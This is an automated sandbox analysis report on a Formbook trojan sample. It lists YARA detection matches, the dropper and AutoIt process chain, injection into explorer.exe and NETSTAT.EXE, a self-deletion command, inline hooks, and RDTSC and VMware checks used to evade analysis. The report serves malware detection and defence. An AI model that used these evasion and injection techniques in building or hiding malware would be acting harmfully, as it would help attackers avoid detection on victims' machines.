Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040324F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		1_2_00F35778

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF8B30 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EE1A36 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF0D17 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EF9FA5 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00EE1CB6 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: String function: 00F01B70 appears 39 times

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A35B NtCreateFile,	2_2_0041A35B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041A48B NtClose,	2_2_0041A48B

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F342D5: CreateFileW,DeviceIoControl,CloseHandle,

1_2_00F342D5

Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs shedfam.exe

Source: shedfam.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/5@3/2

Source: C:\Users\user\Desktop\shedfam.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F3A6AD GetLastError,FormatMessageW,

1_2_00F3A6AD

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

1_2_00F3443D

Source: C:\Users\user\Desktop\shedfam.exe

File read: C:\Users\user\Desktop\shedfam.exe

Jump to behavior

Source: C:\Users\user\Desktop\shedfam.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\shedfam.exe C:\Users\user\Desktop\shedfam.exe
Source: C:\Users\user\Desktop\shedfam.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\shedfam.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shedfam.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F28DE9 AdjustTokenPrivileges,CloseHandle,		1_2_00F28DE9
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_00F29399

Source: C:\Users\user\Desktop\shedfam.exe

File created: C:\Users\user\AppData\Local\Temp\nse13E8.tmp

Jump to behavior

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\shedfam.exe

Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004043F5

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_00F34148

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source:	Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EF8B75 push ecx; ret	1_2_00EF8B88
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041693E push ebp; ret	2_2_0041693F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0040D308 push FFFFFF90h; iretd	2_2_0040D30D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EF8B75 push ecx; ret	2_2_00EF8B88

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00F4C6D9 LoadLibraryA,GetProcAddress,

1_2_00F4C6D9

Source: C:\Users\user\Desktop\shedfam.exe

File created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE7

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	1_2_00F559B3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00EE5EDA
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 2_2_00EE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00EE5EDA

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00EF33B7

Source: C:\Users\user\Desktop\shedfam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002F19904 second address: 0000000002F1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002F19B7E second address: 0000000002F19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-99351

Source: C:\Windows\explorer.exe TID: 6016	Thread sleep time: -32000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5356	Thread sleep time: -32000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-100241

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API coverage: 1.4 %

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 2_2_00409AB0 rdtsc

2_2_00409AB0

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_1-98249

Source: C:\Users\user\Desktop\shedfam.exe	API call chain: ExitProcess graph end node			graph_0-3335
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	API call chain: ExitProcess graph end node			graph_1-98383

Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.266277554.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.331131517.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.261007312.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.271013770.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe

Code function: 1_2_00EE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_00EE5D13

Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,	0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe	Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00F34005
